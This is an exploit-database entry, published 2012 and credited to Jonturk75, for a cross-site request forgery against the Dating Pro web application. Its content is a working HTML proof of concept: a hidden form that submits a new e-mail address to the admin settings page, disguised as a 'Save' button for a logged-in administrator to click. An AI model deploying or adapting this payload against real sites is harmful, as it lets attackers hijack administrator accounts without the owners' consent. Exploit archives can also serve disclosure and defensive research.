Dating Pro CSRF (change e-mail address)



EKU-ID: 1665 CVE: OSVDB-ID:
Author: Jonturk75 Published: 2012-03-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Exploit Title: Dating Pro CSRF (change e-mail address)
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/dating-pro/21517/
# Category::  webapps
# Demo : http://demo.datingpro.com/dating/admin
# Greetz: Inj3ct0r Exploit DataBase 1337day.com



<form name="email_form" action="target.com/[PATH]/admin_settings.php?section=1" method="post">
<input type="hidden" name="email" value="mail@mail.com" size=30>
<a href="#" class="admin_button_major" onclick="javascript:document.email_form.submit();">Save<span>&nbsp;</span></a>
</form>